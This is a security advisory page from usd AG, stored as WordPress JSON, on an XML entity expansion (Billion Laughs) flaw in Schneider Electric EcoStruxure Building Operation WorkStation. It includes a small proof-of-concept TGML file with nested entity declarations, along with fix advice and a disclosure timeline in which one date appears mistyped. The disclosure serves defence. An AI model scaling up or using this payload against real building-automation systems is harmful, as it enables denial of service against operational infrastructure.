{"id":25299,"date":"2026-07-14T07:57:07","date_gmt":"2026-07-14T05:57:07","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=25299"},"modified":"2026-07-14T08:00:02","modified_gmt":"2026-07-14T06:00:02","slug":"usd-2025-44","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-44\/","title":{"rendered":"usd-2025-44"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.7\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n<h1>usd-2025-44 | EcoStruxure Building Operation - WorkStation 7.0.2.348 - XML Entity Expansion (Billion Laughs Attack)<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: EcoStruxure Building Operation - WorkStation<br \/><strong>Affected Version<\/strong>: 7.0.2.348<br \/><strong>Vulnerability Type<\/strong>: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion') (CWE-776)<br \/><strong>Security Risk<\/strong>: MEDIUM<br \/><strong>Vendor<\/strong>: Schneider Electric<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/ecostruxure-building-help.se.com\/bms\/topics\/show.castle?id=8064&amp;locale=en-US&amp;productversion=7.0\" target=\"_blank\" rel=\"noopener\">https:\/\/ecostruxure-building-help.se.com\/bms\/topics\/show.castle?id=8064&amp;locale=en-US&amp;productversion=7.0<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE Number<\/strong>: <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-1227\" target=\"_blank\" rel=\"noopener\">CVE-2026-1227<\/a><br \/><strong>CVE Link<\/strong>: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-1227<br \/><strong>Advisory ID<\/strong>: usd-2025-44<\/p>\n<h3>Description<\/h3>\n<p>The XML interpreter allows the recursive resolution of arbitrary XML entities.<\/p>\n<p>The XML specification allows the definition of entities that can reference other entities within the same document.<br \/>When the XML parser processes such documents, it must resolve these references recursively, which can result in an exponential increase in resource consumption depending on the level of recursion.<\/p>\n<p>As a result, even a short XML message can cause an excessively high load on the server.<br \/>Attackers may exploit this behavior to perform a denial of service (DoS) attack without the need for extensive resources or infrastructure.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The tgml-viewer accepts malicious Graphics in <strong>TGML<\/strong> format with XML including DTD\/ENTITY declarations.<br \/>In the following excerpt, a specially crafted <strong>TGML<\/strong> document is shown:<\/p>\n<pre class=\"codehilite\" style=\"line-height: 125%;background: #263238;color: #eff\">&lt;?xml version=\"1.0\"?&gt;<br \/>&lt;!DOCTYPE tgml<br \/> [<br \/>  &lt;!-- 1. Internal entity --&gt;<br \/>  &lt;!ENTITY a3 \"hello\" &gt;<br \/>  &lt;!ENTITY a4 \"&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;\"&gt;<br \/>]&gt;<br \/>&lt;?tgml version=\"2.0\"?&gt;<br \/>&lt;Tgml Background=\"#E0E0E0\" ComponentCounter=\"4\" GridSize=\"10\"&gt;<br \/>  &lt;!-- XEE Test --&gt;<br \/>  &lt;Text FontFamily=\"Arial\" FontSize=\"20\" FontStyle=\"Normal\"<br \/>        FontWeight=\"Normal\" HorizontalAlign=\"Left\" Left=\"0.0\"<br \/>        Opacity=\"1.0\" TextDecoration=\"None\" Top=\"40.0\"<br \/>        VerticalAlign=\"Top\"&gt;<br \/>    XEE Test: &amp;a4;<br \/>  &lt;\/Text&gt;<br \/>&lt;\/Tgml&gt;<\/pre>\n<p>A new graphic was created using the malicious TGML document:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object.png\" width=\"1353\" height=\"718\" alt=\"\" class=\"wp-image-25183 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object.png 1353w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object-1280x679.png 1280w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object-980x520.png 980w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object-480x255.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1353px, 100vw\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/select_object_type.png\" width=\"918\" height=\"506\" alt=\"\" class=\"wp-image-25181 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/select_object_type.png 918w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/select_object_type-480x265.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 918px, 100vw\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/choose_crafted_tgml.png\" width=\"786\" height=\"432\" alt=\"\" class=\"wp-image-25187 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/choose_crafted_tgml.png 786w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/choose_crafted_tgml-480x264.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 786px, 100vw\" \/><\/p>\n<p>When inspecting the newly created Graphic in WorkStation, it is evident that the entity expansion was successful.<br \/>The following excerpt proves this:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/xee_triggered1.png\" width=\"700\" height=\"175\" alt=\"\" class=\"wp-image-25197 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/xee_triggered1.png 700w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/xee_triggered1-480x120.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 700px, 100vw\" \/><\/p>\n<ul>\n<li><strong>NOTE<\/strong>: The expansion was kept so small that no denial of service was triggered, so as not to jeopardize ongoing operations.<\/li>\n<\/ul>\n<h3>Fix<\/h3>\n<p>It is recommended to disable XML entity processing if it is not required.<br \/>Alternatively, the number of entities which may be resolved per request can be limited.<br \/>It is also possible to limit the number of characters to which an entity can expand.<\/p>\n<h3>References<\/h3>\n<p>A official advisory by Schneider Electric can be found here: <a href=\"https:\/\/download.schneider-electric.com\/files?p_Doc_Ref=SEVD-2026-041-02&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-041-02.pdf\" target=\"_blank\" rel=\"noopener\">https:\/\/download.schneider-electric.com\/files?p_Doc_Ref=SEVD-2026-041-02&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-041-02.pdf<\/a><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-09-12<\/strong>: Vulnerabilities reported to Schneider Electric<\/li>\n<li><strong>2026-09-19<\/strong>: Schneider Electric assign the internal IDs SE-20492, SE-20493 and SE-20494<\/li>\n<li><strong>2026-01-02<\/strong>: After multiple follow-ups, the vendor reports that the investigation of the report is finished and that a fix will be released in Q1 2026<\/li>\n<li><strong>2026-07-14<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Robin Plugge of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-44 | EcoStruxure Building Operation - WorkStation 7.0.2.348 - XML Entity Expansion (Billion Laughs Attack) Product: EcoStruxure Building Operation - WorkStationAffected Version: 7.0.2.348Vulnerability Type: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion') (CWE-776)Security Risk: MEDIUMVendor: Schneider ElectricVendor URL: https:\/\/ecostruxure-building-help.se.com\/bms\/topics\/show.castle?id=8064&amp;locale=en-US&amp;productversion=7.0Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: CVE-2026-1227CVE Link: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-1227Advisory ID: usd-2025-44 Description The [&hellip;]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-25299","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25299","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=25299"}],"version-history":[{"count":4,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25299\/revisions"}],"predecessor-version":[{"id":25306,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25299\/revisions\/25306"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=25299"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}